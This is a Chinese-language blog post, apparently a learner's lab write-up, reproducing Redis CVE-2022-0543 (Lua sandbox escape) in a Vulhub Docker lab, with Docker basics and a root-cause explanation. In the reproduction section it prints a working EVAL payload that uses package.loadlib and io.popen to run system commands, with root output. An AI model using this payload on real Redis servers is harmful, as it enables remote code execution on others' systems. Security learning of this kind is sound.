<!DOCTYPE html><html lang="zh-CN"> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="description" content="Vulhub 是一个基于 Docker-Compose 的漏洞环境集合。这是系列第一篇，记录环境搭建和漏洞复现过程。"><meta property="og:title" content="Vulhub 漏洞复现学习笔记（一）：Redis CVE-2022-0543 | PeterYang"><meta property="og:description" content="Vulhub 是一个基于 Docker-Compose 的漏洞环境集合。这是系列第一篇，记录环境搭建和漏洞复现过程。"><meta property="og:image" content="/avatar.jpg"><meta property="og:type" content="website"><title>Vulhub 漏洞复现学习笔记（一）：Redis CVE-2022-0543 | PeterYang</title><link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&family=Noto+Sans+SC:wght@400;500;600;700&display=swap" rel="stylesheet"><link rel="stylesheet" href="/_astro/archive.eQB70TAI.css">
<style>.meta[data-astro-cid-gysqo7gh]{display:flex;align-items:center;gap:8px;flex-wrap:wrap;margin-bottom:20px;font-size:14px;color:var(--text-tertiary)}.tag[data-astro-cid-gysqo7gh]{font-size:11px;padding:2px 9px;border-radius:9999px;background:#007aff1a;color:var(--blue);font-weight:540}.toc[data-astro-cid-gysqo7gh]{background:#00000005;border-radius:12px;padding:16px 20px;margin:20px 0 28px}html[data-theme=dark] .toc[data-astro-cid-gysqo7gh]{background:#ffffff08}.toc-title[data-astro-cid-gysqo7gh]{font-size:14px;font-weight:620;margin-bottom:8px;color:var(--text)}.toc[data-astro-cid-gysqo7gh] ul[data-astro-cid-gysqo7gh]{list-style:none;padding:0;margin:0}.toc[data-astro-cid-gysqo7gh] li[data-astro-cid-gysqo7gh]{margin:4px 0}.toc[data-astro-cid-gysqo7gh] a[data-astro-cid-gysqo7gh]{font-size:14px;color:var(--blue);text-decoration:none}.toc[data-astro-cid-gysqo7gh] a[data-astro-cid-gysqo7gh]:hover{opacity:.65}.toc-h3[data-astro-cid-gysqo7gh]{padding-left:16px}.series-nav[data-astro-cid-gysqo7gh]{margin-top:40px;padding-top:24px;border-top:.5px solid rgba(0,0,0,.06)}html[data-theme=dark] .series-nav[data-astro-cid-gysqo7gh]{border-top-color:#ffffff0f}.series-title[data-astro-cid-gysqo7gh]{font-size:14px;font-weight:620;color:var(--text);margin-bottom:12px}.series-links[data-astro-cid-gysqo7gh]{display:flex;gap:12px}.series-prev[data-astro-cid-gysqo7gh],.series-next[data-astro-cid-gysqo7gh]{flex:1;display:flex;flex-direction:column;gap:4px;padding:14px 16px;border-radius:12px;background:#00000005;text-decoration:none;transition:background .2s}html[data-theme=dark] .series-prev[data-astro-cid-gysqo7gh],html[data-theme=dark] .series-next[data-astro-cid-gysqo7gh]{background:#ffffff08}.series-prev[data-astro-cid-gysqo7gh]:hover,.series-next[data-astro-cid-gysqo7gh]:hover{background:#007aff0f}.series-label[data-astro-cid-gysqo7gh]{font-size:12px;color:var(--text-tertiary)}.series-name[data-astro-cid-gysqo7gh]{font-size:14px;font-weight:540;color:var(--blue);display:-webkit-box;-webkit-line-clamp:1;-webkit-box-orient:vertical;overflow:hidden}.series-next[data-astro-cid-gysqo7gh]{text-align:right}@media(max-width:640px){.series-links[data-astro-cid-gysqo7gh]{flex-direction:column}}
</style></head> <body> <div class="bg-ambient bg-ambient-1"></div> <div class="bg-ambient bg-ambient-2"></div> <div class="bg-ambient bg-ambient-3"></div> <nav class="nav"> <a href="/" class="nav-brand">PeterYang</a> <div class="nav-right"> <ul class="nav-links"> <li><a href="/">Home</a></li> <li><a href="/archive/">Archive</a></li> <li><a href="/posts/about/">About</a></li> <li><a href="/posts/guestbook/">Guestbook</a></li> </ul> <button class="theme-toggle" id="theme-toggle" aria-label="Toggle theme"> <svg class="icon-moon" viewBox="0 0 24 24"><path d="M21 12.79A9 9 0 1 1 11.21 3 7 7 0 0 0 21 12.79z"></path></svg> <svg class="icon-sun" viewBox="0 0 24 24"><circle cx="12" cy="12" r="5"></circle><line x1="12" y1="1" x2="12" y2="3"></line><line x1="12" y1="21" x2="12" y2="23"></line><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"></line><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"></line><line x1="1" y1="12" x2="3" y2="12"></line><line x1="21" y1="12" x2="23" y2="12"></line><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"></line><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"></line></svg> </button> <button class="hamburger" id="hamburger" aria-label="Menu">☰</button> </div> </nav> <main class="container">  <article class="prose liquid-glass" data-astro-cid-gysqo7gh> <a class="back-link" href="/" data-astro-cid-gysqo7gh>&larr; Back</a> <h1 data-astro-cid-gysqo7gh>Vulhub 漏洞复现学习笔记（一）：Redis CVE-2022-0543</h1> <div class="meta" data-astro-cid-gysqo7gh> <span class="date" data-astro-cid-gysqo7gh>2026-06-23</span> <span class="reading-time" data-astro-cid-gysqo7gh>· 3 min read</span> <span class="tag" data-astro-cid-gysqo7gh>Security</span><span class="tag" data-astro-cid-gysqo7gh>Vulhub</span> </div> <hr data-astro-cid-gysqo7gh> <nav class="toc" data-astro-cid-gysqo7gh> <p class="toc-title" data-astro-cid-gysqo7gh>Contents</p> <ul data-astro-cid-gysqo7gh> <li class data-astro-cid-gysqo7gh> <a href="#一学习背景" data-astro-cid-gysqo7gh>一、学习背景</a> </li><li class data-astro-cid-gysqo7gh> <a href="#二docker-基础知识学习" data-astro-cid-gysqo7gh>二、Docker 基础知识学习</a> </li><li class="toc-h3" data-astro-cid-gysqo7gh> <a href="#1-docker-是什么" data-astro-cid-gysqo7gh>1. Docker 是什么？</a> </li><li class="toc-h3" data-astro-cid-gysqo7gh> <a href="#2-image镜像" data-astro-cid-gysqo7gh>2. Image（镜像）</a> </li><li class="toc-h3" data-astro-cid-gysqo7gh> <a href="#3-container容器" data-astro-cid-gysqo7gh>3. Container（容器）</a> </li><li class="toc-h3" data-astro-cid-gysqo7gh> <a href="#4-docker-compose" data-astro-cid-gysqo7gh>4. Docker Compose</a> </li><li class data-astro-cid-gysqo7gh> <a href="#三docker-网络理解" data-astro-cid-gysqo7gh>三、Docker 网络理解</a> </li><li class data-astro-cid-gysqo7gh> <a href="#四部署漏洞环境" data-astro-cid-gysqo7gh>四、部署漏洞环境</a> </li><li class data-astro-cid-gysqo7gh> <a href="#五redis-lua-功能学习" data-astro-cid-gysqo7gh>五、Redis Lua 功能学习</a> </li><li class data-astro-cid-gysqo7gh> <a href="#六漏洞原理分析" data-astro-cid-gysqo7gh>六、漏洞原理分析</a> </li><li class data-astro-cid-gysqo7gh> <a href="#七漏洞复现" data-astro-cid-gysqo7gh>七、漏洞复现</a> </li><li class data-astro-cid-gysqo7gh> <a href="#八漏洞分析" data-astro-cid-gysqo7gh>八、漏洞分析</a> </li><li class data-astro-cid-gysqo7gh> <a href="#九本次学习收获" data-astro-cid-gysqo7gh>九、本次学习收获</a> </li><li class data-astro-cid-gysqo7gh> <a href="#十后续学习计划" data-astro-cid-gysqo7gh>十、后续学习计划</a> </li><li class data-astro-cid-gysqo7gh> <a href="#总结" data-astro-cid-gysqo7gh>总结</a> </li> </ul> </nav> <blockquote>
<p>学习环境：Kali Linux 2026.3 + Docker + Vulhub
漏洞编号：CVE-2022-0543
漏洞类型：Remote Code Execution（RCE）
漏洞平台：Redis 5.0.7（Debian/Ubuntu 打包版本）</p>
</blockquote>
<h2 id="一学习背景">一、学习背景</h2>
<p>为了系统学习网络安全中的漏洞原理与漏洞利用，我决定采用 <strong>Vulhub</strong> 作为漏洞复现平台。</p>
<p>相比直接在真实服务器部署漏洞环境，Vulhub 基于 Docker 构建漏洞环境，每一个漏洞都是一个独立的容器，既方便部署，也不会污染宿主机环境，非常适合作为网络安全学习平台。</p>
<p>本次选择的第一个漏洞为 <strong>Redis CVE-2022-0543</strong>，主要原因有以下几点：</p>
<ul>
<li>漏洞环境简单</li>
<li>Docker 配置容易理解</li>
<li>可以学习 Docker 的基本使用</li>
<li>可以理解 Redis Lua 沙箱机制</li>
<li>能够完整体验一次真实 RCE 漏洞利用过程</li>
</ul>
<h2 id="二docker-基础知识学习">二、Docker 基础知识学习</h2>
<p>在正式复现漏洞之前，首先学习了 Docker 的几个基础概念。</p>
<h3 id="1-docker-是什么">1. Docker 是什么？</h3>
<p>Docker 是一种轻量级容器技术，可以将应用程序及其运行环境一起打包成一个容器，实现一次构建，到处运行。</p>
<p>与传统虚拟机相比：</p>

























<table><thead><tr><th>虚拟机</th><th>Docker</th></tr></thead><tbody><tr><td>包含完整操作系统</td><td>共用宿主机内核</td></tr><tr><td>占用资源较大</td><td>启动速度快</td></tr><tr><td>几 GB 起步</td><td>通常几十 MB 到几百 MB</td></tr><tr><td>运行完整系统</td><td>运行单个应用</td></tr></tbody></table>
<p>Docker 更像是在宿主机上运行了一个隔离的小型 Linux 环境。</p>
<h3 id="2-image镜像">2. Image（镜像）</h3>
<p>镜像可以理解成一个软件模板。</p>
<p>例如：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>vulhub/redis:5.0.7</span></span></code></pre>
<p>表示：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>作者：vulhub</span></span>
<span class="line"><span>软件：Redis</span></span>
<span class="line"><span>版本：5.0.7</span></span></code></pre>
<p>镜像本身不会运行。只有基于镜像创建容器后，软件才真正开始运行。</p>
<h3 id="3-container容器">3. Container（容器）</h3>
<p>容器可以理解为：镜像运行后的实例。一个镜像可以创建多个容器。</p>
<p>每个容器都有：独立文件系统、独立进程空间、独立网络空间。因此多个 Redis 可以同时运行而互不影响。</p>
<h3 id="4-docker-compose">4. Docker Compose</h3>
<p>Vulhub 使用 Docker Compose 管理漏洞环境。每一个漏洞目录都有一个 <code>docker-compose.yml</code>。</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="yaml"><code><span class="line"><span style="color:#89B4FA">version</span><span style="color:#94E2D5">:</span><span style="color:#A6E3A1"> '2'</span></span>
<span class="line"><span style="color:#89B4FA">services</span><span style="color:#94E2D5">:</span></span>
<span class="line"><span style="color:#89B4FA">  redis</span><span style="color:#94E2D5">:</span></span>
<span class="line"><span style="color:#89B4FA">    image</span><span style="color:#94E2D5">:</span><span style="color:#A6E3A1"> vulhub/redis:5.0.7</span></span>
<span class="line"><span style="color:#89B4FA">    ports</span><span style="color:#94E2D5">:</span></span>
<span class="line"><span style="color:#9399B2">      -</span><span style="color:#A6E3A1"> "6379:6379"</span></span></code></pre>
<p>其含义如下：创建一个 Redis 服务，使用 vulhub/redis:5.0.7 镜像，将宿主机 6379 端口映射到容器 6379 端口。Docker 根据该配置即可自动完成漏洞环境部署。</p>
<h2 id="三docker-网络理解">三、Docker 网络理解</h2>
<p>第一次学习 Docker 时，最困惑的问题就是：<strong>为什么访问 Kali 的 6379，实际上访问的是 Docker 里面的 Redis？</strong></p>
<p>原因是 Docker 自动创建了端口映射。</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Kali 127.0.0.1:6379</span></span>
<span class="line"><span>        │</span></span>
<span class="line"><span>   Docker Port Mapping</span></span>
<span class="line"><span>        │</span></span>
<span class="line"><span>        ▼</span></span>
<span class="line"><span>Redis Container :6379</span></span></code></pre>
<p><code>docker-compose.yml</code> 中 <code>"6379:6379"</code> 表示 <code>宿主机端口 : 容器端口</code>，因此 <code>redis-cli -h 127.0.0.1</code> 实际上连接的是 Docker 内部 Redis。</p>
<h2 id="四部署漏洞环境">四、部署漏洞环境</h2>
<p>进入漏洞目录：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#F38BA8;font-style:italic">cd</span><span style="color:#A6E3A1"> ~/lab/vulhub/redis/CVE-2022-0543</span></span></code></pre>
<p>启动漏洞环境：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">sudo</span><span style="color:#A6E3A1"> docker-compose</span><span style="color:#A6E3A1"> up</span><span style="color:#A6E3A1"> -d</span></span></code></pre>
<p>查看运行容器：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">sudo</span><span style="color:#A6E3A1"> docker</span><span style="color:#A6E3A1"> ps</span></span></code></pre>
<p>看到 <code>vulhub/redis:5.0.7</code> 状态为 Up，端口 6379→6379，说明漏洞环境已经成功启动。</p>
<h2 id="五redis-lua-功能学习">五、Redis Lua 功能学习</h2>
<p>Redis 不仅是 Key-Value 数据库，它还支持 Lua 脚本执行。</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>EVAL "return 1+1" 0</span></span>
<span class="line"><span># (integer) 2</span></span></code></pre>
<p>Redis 使用 Lua 的目的主要是：提高执行效率、保证多个操作的原子性、减少客户端与服务器通信次数。</p>
<h2 id="六漏洞原理分析">六、漏洞原理分析</h2>
<p>正常情况下，Redis 会将 Lua 放入一个沙箱（Sandbox）。沙箱中的 Lua 可以进行数学计算、处理字符串、访问 Lua 基础库，但<strong>不能读取文件、执行 Linux 命令、加载动态链接库</strong>。</p>
<p>但是 Debian/Ubuntu 在打包 Redis 时，错误地保留了 <code>package</code> 模块。攻击者可以利用 <code>package.loadlib()</code> 加载 Linux 的动态库 <code>/usr/lib/x86_64-linux-gnu/liblua5.1.so.0</code>，随后调用 <code>luaopen_io</code> 重新获得 Lua 的 io 库。而 io 库中的 <code>io.popen()</code> 能够直接执行 Linux 命令。</p>
<p>攻击流程：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Redis → Lua → package.loadlib() → 加载 liblua → 获得 io → io.popen() → Linux Shell → RCE</span></span></code></pre>
<p>这就是所谓的 <strong>Lua Sandbox Escape（Lua 沙箱逃逸）</strong>，最终形成 <strong>Remote Code Execution（RCE）</strong>。</p>
<h2 id="七漏洞复现">七、漏洞复现</h2>
<p>连接 Redis：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#89B4FA;font-style:italic">redis-cli</span><span style="color:#A6E3A1"> -h</span><span style="color:#FAB387"> 127.0.0.1</span></span></code></pre>
<p>执行漏洞利用代码：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="lua"><code><span class="line"><span style="color:#89B4FA;font-style:italic">EVAL</span><span style="color:#A6E3A1"> 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0","luaopen_io"); local io = io_l(); local f = io.popen("id","r"); local res = f:read("*a"); f:close(); return res' </span><span style="color:#FAB387">0</span></span></code></pre>
<p>实验结果：</p>
<pre class="astro-code catppuccin-mocha" style="background-color:#1e1e2e;color:#cdd6f4; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>uid=0(root) gid=0(root) groups=0(root)</span></span></code></pre>
<p>Redis 已经成功执行 Linux 的 <code>id</code> 命令，漏洞验证成功。</p>
<p><img src="/CVE-2022-0543.png" alt="CVE-2022-0543 漏洞复现成功截图"></p>
<h2 id="八漏洞分析">八、漏洞分析</h2>
<p>整个攻击链：攻击者 → Redis 6379 → EVAL → Lua → package.loadlib() → liblua.so → luaopen_io() → io.popen() → Linux Shell → 执行命令 → 返回结果。</p>
<p>整个过程中，攻击者<strong>无需 SSH 登录、Shell 权限、本地账号</strong>，仅通过 Redis 提供的 Lua 功能即可执行系统命令。因此属于典型的 <strong>远程代码执行漏洞（RCE）</strong>。</p>
<h2 id="九本次学习收获">九、本次学习收获</h2>
<ol>
<li>学会使用 Docker 部署漏洞环境</li>
<li>理解了 Image、Container、Compose 三个核心概念</li>
<li>理解了 Docker 端口映射机制</li>
<li>掌握 docker-compose.yml 的基本结构</li>
<li>学会使用 docker ps 查看运行容器</li>
<li>理解 Redis Lua 的基本机制</li>
<li>学习 Lua 沙箱（Sandbox）的设计思想</li>
<li>理解 Debian 打包 Redis 时产生漏洞的原因</li>
<li>成功复现 Redis CVE-2022-0543 漏洞</li>
<li>理解一次完整的远程代码执行（RCE）攻击链</li>
</ol>
<h2 id="十后续学习计划">十、后续学习计划</h2>
<p>下一阶段计划继续利用 Vulhub 学习更多典型漏洞：</p>
<ul>
<li>Fastjson 反序列化漏洞</li>
<li>ThinkPHP RCE</li>
<li>Apache Log4j2（Log4Shell）</li>
<li>Spring Framework 漏洞</li>
<li>Apache Shiro 反序列化漏洞</li>
<li>Nginx 漏洞</li>
<li>WebLogic 漏洞</li>
</ul>
<p>同时进一步学习 Docker 网络、Volume、Image 制作、容器安全、漏洞分析方法与修复方案，逐步形成完整的 Web 安全与漏洞分析知识体系。</p>
<hr>
<h2 id="总结">总结</h2>
<p>本次实验成功利用 Vulhub 部署了 Redis 漏洞环境，并复现了 <strong>CVE-2022-0543</strong> 漏洞。通过实验，不仅验证了漏洞的真实性，还深入理解了 Docker 容器、端口映射、Redis Lua 沙箱机制以及漏洞形成原因。相比简单地按照教程执行命令，更重要的是掌握了漏洞背后的原理和攻击链，为后续学习更多 Web 漏洞和容器化安全技术奠定了基础。</p>  </article>  </main> <footer class="footer"> <div class="footer-links"> <a href="https://github.com/yangpeter26-bot" target="_blank" rel="noopener">GitHub</a> <a href="/rss.xml">RSS</a> <a href="https://mail.google.com/mail/?view=cm&to=yangpeter26@gmail.com" target="_blank">Email</a> </div> <p>&copy; 2026 PeterYang</p> </footer> <script>
      const saved = localStorage.getItem("theme");
      const prefersDark = window.matchMedia("(prefers-color-scheme: dark)").matches;
      document.documentElement.dataset.theme = saved || (prefersDark ? "dark" : "light");
      const btn = document.getElementById("theme-toggle");
      btn.addEventListener("click", () => {
        const next = document.documentElement.dataset.theme === "dark" ? "light" : "dark";
        document.documentElement.dataset.theme = next;
        localStorage.setItem("theme", next);
      });
      const hamburger = document.getElementById("hamburger");
      let mobileMenu = null;
      const links = [
        { href: "/", text: "Home" },
        { href: "/archive/", text: "Archive" },
        { href: "/posts/about/", text: "About" },
        { href: "/posts/guestbook/", text: "Guestbook" },
      ];
      hamburger.addEventListener("click", () => {
        if (!mobileMenu) {
          mobileMenu = document.createElement("div");
          mobileMenu.className = "mobile-menu open";
          links.forEach(l => {
            const a = document.createElement("a");
            a.href = l.href;
            a.textContent = l.text;
            mobileMenu.appendChild(a);
          });
          document.querySelector(".nav").after(mobileMenu);
        } else {
          mobileMenu.classList.toggle("open");
          if (!mobileMenu.classList.contains("open")) {
            mobileMenu.remove();
            mobileMenu = null;
          }
        }
      });

      // Code copy buttons
      document.querySelectorAll(".prose pre").forEach((pre) => {
        const btn = document.createElement("button");
        btn.className = "copy-btn";
        btn.textContent = "Copy";
        btn.addEventListener("click", () => {
          const code = pre.querySelector("code")?.textContent || pre.textContent;
          navigator.clipboard.writeText(code).then(() => {
            btn.textContent = "Copied!";
            btn.classList.add("copied");
            setTimeout(() => { btn.textContent = "Copy"; btn.classList.remove("copied"); }, 2000);
          });
        });
        pre.appendChild(btn);
      });
    </script> </body> </html> 